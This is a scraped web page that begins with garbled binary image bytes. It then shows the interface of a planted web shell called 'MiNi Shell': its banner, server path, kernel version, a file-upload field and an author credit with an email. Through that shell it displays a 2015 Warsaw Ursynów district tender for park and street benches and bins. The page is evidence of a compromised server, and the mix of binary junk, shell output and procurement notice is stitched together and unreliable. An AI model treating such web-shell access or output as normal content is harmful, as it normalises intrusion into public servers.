JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150409/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150409/79260-N-2015.html

<p class="kh_header"><b>Warszawa: Zakup, dostarczenie i montaż  koszy i ławek parkowych, koszy i  ławek  ulicznych  oraz   koszy  na  odchody  zwierząt  domowych  na  terenach zieleni  Dzielnicy  Ursynów</b><br>
<b>Numer ogłoszenia: 79260 - 2015; data zamieszczenia: 09.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Ursynów , al. Komisji Edukacji Narodowej 61, 02-777 Warszawa, woj. mazowieckie, tel. 022 5457100, faks 022 5457291.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup, dostarczenie i montaż  koszy i ławek parkowych, koszy i  ławek  ulicznych  oraz   koszy  na  odchody  zwierząt  domowych  na  terenach zieleni  Dzielnicy  Ursynów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  zakup, dostarczenie i montaż  koszy i ławek parkowych, koszy i  ławek  ulicznych  oraz   koszy  na  odchody  zwierząt  domowych  na  terenach zieleni  Dzielnicy  Ursynów.

W celu zachowania określonego stylu istniejących elementów małej architektury, tj. koszy i ławek parkowych, koszy i ławek ulicznych  oraz koszy na odchody zwierząt domowych, które zostały  zamontowane w ubiegłych latach na terenach zieleni Dzielnicy Ursynów, nowe ławki i kosze wszystkich typów muszą być wykonane w oparciu o wzory ławek i koszy o wyglądzie i parametrach technicznych równoważnych z istniejącymi (wzór ławek i  koszy wszystkich typów na załączonych zdjęciach - załączniki nr 1, nr 2, nr 3, nr 4, nr 5 i nr 6 do opisu przedmiotu zamówienia).
I. Kosze parkowe 
1. Dane techniczne::
-pojemność			:  35l
-wysokość części nadziemnej	: 110cm
- waga				: 17 kg

2. Materiały:
- stal łączona z odlewami aluminiowymi i żeliwnymi
- malowanie: powłoka antykorozyjna, kolor: RAL7021

3.  Montaż:
Wyrób przystosowany do montażu na stałe poprzez zabetonowanie, w tym m.in.: demontaż nawierzchni  o pow. ca 0,3 m2, wykopanie dołka, wywóz nadmiaru ziemi, obsadzenie kosza, zalanie dołka betonem, uzupełnienie zdemontowanej nawierzchni oraz uporządkowanie terenu.

II. Ławki  parkowe
1. Dane techniczne:
- długość ławki              :   180 cm
- wysokość całkowita    :     72 cm
- wysokość siedziska    :     43 cm
- szerokość siedziska   :     46 cm
- szerokość oparcia      :     30 cm
- waga  :  60 kg

2. Materiały:
- elementy żeliwne zabezpieczone podkładem  i lakierem zewnętrznym; 
- drewno sosnowe klasy 1-2 o grubości min.46 mm, impregnowane, dwukrotnie kryte lazurem, zewnętrznym; 
- kolor ciemny brąz;
- elementy montażowe ocynkowane.

3.  Montaż:
Montaż ławek należy wykonać poprzez zamocowanie tych urządzeń przy użyciu kotew chemicznych.

III. Kosze stalowe  (bez popielniczki)

1. Dane techniczne: 
Wg opisu na załączonym rysunku kosza  - załącznik nr 6 do opisu przedmiotu zamówienia

2. Materiały:
-   stal nierdzewna satynowana;
-	elementy montażowe ocynkowane.

3.  Montaż:
Wyrób przystosowany do montażu na stałe poprzez zabetonowanie, w tym m.in.: demontaż nawierzchni  o pow. ca 0,3 m2, wykopanie dołka, wywóz nadmiaru ziemi, obsadzenie kosza, zalanie dołka betonem, uzupełnienie zdemontowanej nawierzchni oraz uporządkowanie terenu.

IV. Kosze  uliczne  

1. Dane techniczne:
- wysokość całkowita     :     75 cm
- podstawa                     :     50 cm x 50 cm
- waga                            :     180 kg
- pojemność                   :     40 l
- pojemnik (wkład do kosza) z blachy ocynkowanej grub.1 mm.
2.  Materiały:
-	elementy betonowe zbrojone, wykonane z betonu płukanego klasy B-25,  impregnowane;
-	stal płaskownik 50 x 6 mm, zabezpieczona podkładem  i lakierem zewnętrznym, farbami typu okrętowego;
-	drewno sosnowe klasy 1-2 o grubości 48 mm, impregnowane, dwukrotnie kryte lazurem zewnętrznym;
-	elementy montażowe ocynkowane.

Ponadto,  każdy kosz należy oznakować poprzez wytłoczenie na jednym z jego dwóch betonowych boków  litery DU, tj. symbolu właściciela - Dzielnicy Ursynów.

3.  Montaż:
Montaż koszy należy wykonać poprzez mocowanie ich do podłoża  na głębokość 50 cm, za pomocą kotew stalowych.

V. Ławki  uliczne 

1. Dane techniczne:
- długość ławki              :   200 cm
- wysokość całkowita    :     70 cm
- wysokość siedziska    :     40 cm
- szerokość siedziska   :     46 cm
- szerokość oparcia      :     30 cm
- rozstaw nóg w obrysie zewnętrznym   :  205 cm x  64 cm 
- waga  :  180 kg

2. Materiały:
-	elementy betonowe zbrojone, wykonane z betonu płukanego klasy B-25,  impregnowane;
-	stal profil zamknięty min.50 x 30 x 3 mm, zabezpieczona podkładem  i lakierem zewnętrznym, farbami typu okrętowego;
-	drewno sosnowe klasy 1-2 o grubości min.46 mm, impregnowane, dwukrotnie kryte lazurem zewnętrznym;
-	elementy montażowe ocynkowane.
Ponadto,  każdą ławkę  należy oznakować poprzez wytłoczenie na jednym z jej dwóch betonowych boków  litery DU,  tj. symbolu właściciela - Dzielnicy Ursynów.

3.  Montaż:
Montaż ławek należy wykonać poprzez mocowanie ich do podłoża  na głębokość 50 cm, za pomocą kotew stalowych.

VI. Kosze na odchody zwierząt domowych : 
1. Dane techniczne:
- wysokość całkowita     :    72 cm
- podstawa                     :    50x35 cm
- waga                            :    80 kg
- pojemność                   :    35 l
- pojemnik wraz z kieszenią  wykonane z blachy ocynkowanej grub.1 mm.

Ponadto, w każdym koszu na tylnej, górnej ścianie pojemnika należy zamocować na stałe (poprzez nitowanie) kieszeń o wymiarach 23 cm x 14 cm, w której będą umieszczane jednorazowe  zestawy higieniczne do zbierania odchodów zwierzęcych.

2. Materiały:
- stal płaskownik 60 x 6 mm, zabezpieczona podkładem  i lakierem zewnętrznym, farbami typu okrętowego;
-	stal kątownik 60 x 60 x 4 mm, zabezpieczona podkładem  i lakierem zewnętrznym, farbami   
 typu okrętowego;
-	drewno sosnowe klasy 1-2 o grubości 50 mm, impregnowane, dwukrotnie kryte lazurem  zewnętrznym;
-	elementy montażowe ocynkowane.
3. Montaż:
Montaż koszy należy wykonać poprzez zakopanie w gruncie na głębokość min.40 cm elementu betonowego znajdującego się u podstawy kosza.

VII. Pojemniki do koszy na odchody zwierząt domowych : 

1. Dane techniczne:
- pojemność                   :    35 l
- pojemnik wykonany z blachy ocynkowanej grub.1 mm. 
Pojemniki o wyglądzie i parametrach technicznych  równoważnych z istniejącymi (wzór pojemnika na załączonym  zdjęciu kosza na odchody zwierząt domowych - załącznik nr 5  do opisu przedmiotu zamówienia)

2. Materiały:
- stal płaskownik 60 x 6 mm, zabezpieczona podkładem  i lakierem zewnętrznym, farbami 
       typu okrętowego;
-	stal kątownik 60 x 60 x 4 mm, zabezpieczona podkładem  i lakierem zewnętrznym, farbami typu okrętowego.

Pojemniki do koszy na odchody zwierząt domowych należy dostarczyć bezpośrednio do miejsca wskazanego przez przedstawiciela Zamawiającego.

UWAGA 
Zamawiający dopuszcza 5% margines odstępstwa od wymaganych parametrów technicznych, które zostały wskazane w opisie przedmiotu zamówienia powyżej  (dot. długości, wysokości, szerokości, grubości, wagi, pojemności itp.), tj. np. długość ławki winna mieścić się w przedziale 190 cm - 210 cm, wysokość całkowita ławki  66,5 cm - 73,5 cm itd. przy czym pozostałe wymagania dot. wyglądu, montażu oraz oznakowania ww. urządzeń pozostają bez zmian.

Miejsca ustawienia nowych ławek oraz koszy zostaną wskazane Wykonawcy przez przedstawiciela Zamawiającego. 

Wykonawca udzieli minimum  24 - miesięcznej gwarancji na dostarczone ławki oraz kosze wszystkich typów.

Opis przedmiotu zamówienia określają również:
- Szczegółowy opis wraz ze standardami technicznymi wykonania przedmiotu zamówienia - załącznik nr 1 do SIWZ stanowiący jednocześnie załącznik nr 1 do wzoru umowy
- wzór umowy - załącznik nr 8 do SIWZ
- formularz cenowy - załącznik nr 3 do SIWZ stanowiący jednocześnie załącznik nr 2 do wzoru umowy.
Zamawiający planuje wykorzystać wartość umowy w minimum 90 %..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6, 39.11.36.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w przedmiotowym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie) wykonał1 (tj. zakończył) co najmniej jedno zamówienie polegające na dostawie i montażu ławek i koszy o wartości nie mniejszej niż  60.000,00 zł brutto.

UWAGA!
1 Za wykonane co najmniej jedno zamówienie polegające na dostawie i montażu ławek i koszy o wartości nie mniejszej niż  60.000,00 zł brutto Zamawiający uzna takie zamówienie, które Wykonawca wykonał w ramach jednej umowy i którego przedmiot został odebrany przez Zamawiającego jako wykonany należycie.

Ocena spełniania warunków udziału w postępowaniu dokonana zostanie w systemie 1 lub 0, zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w oświadczeniu i dokumentach wyszczególnionych w pkt III.4.1.) Ogłoszenia Z treści załączonego oświadczenia i dokumentów  musi wynikać jednoznacznie, iż w/w warunek Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5) 
III.6.1).1. Dowodami o których mowa w pkt III.4.1) Ogłoszenia są:
a) poświadczenie
b) oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt a). 
Ww. dokument musi zawierać przyczyny braku możliwości uzyskania poświadczenia.

2. W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego dostawy wskazane w wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt 1.

III.6.2)  W przypadku gdy Wykonawca będzie polegał na wiedzy i doświadczeniu,  potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych - innego/ych podmiotu/ów, niezależnie od charakteru prawnego łączących go z nim/i stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tego/tych podmiotu/ów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
Dokument ten powinien w szczególności zawierać następujące informacje:
a) zakres dostępnych wykonawcy zasobów innego podmiotu (tj. jaki rodzaj zasobu jest udostępniany);
b) sposób wykorzystania zasobów innego podmiotu praz Wykonawcę przy wykonywaniu zamówienia;
c) charakter stosunku jaki będzie łączył Wykonawcę z innym podmiotem;
d) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.

III.6.3) Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji na dostarczone ławki i kosze - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W odniesieniu do art.144 ust.1 ustawy Prawo zamówień publicznych - Zamawiający zastrzega sobie możliwość zmiany warunków umowy na etapie jej realizacji w zakresie:
1.	Zmiany kadry, tj. osób odpowiedzialnych odpowiednio za: nadzór zamówienia ze strony Wykonawcy,  nadzór ze strony Zamawiającego, w szczególności z powodu zdarzeń losowych, tj. śmierć, choroba, ustanie stosunku pracy.
2.	Zmniejszenia maksymalnego wynagrodzenia brutto z tego powodu, że wykonanie części zamówienia nie leży w interesie publicznym, czego nie można było przewidzieć w dniu zawarcia umowy lub z powodu rezygnacji z wykonania części zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ursynow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> - osobiście w Urzędzie m. st. Warszawy Dzielnicy Ursynów, 02-777 Warszawa, Al. KEN 61 pok. nr 334.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2015 godzina 12:30, miejsce: SIEDZIBA ZAMAWIAJĄCEGO PRZY AL. KEN 61, WYDZIAŁ OCHRONY ŚRODOWISKA, POK. NR 530.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com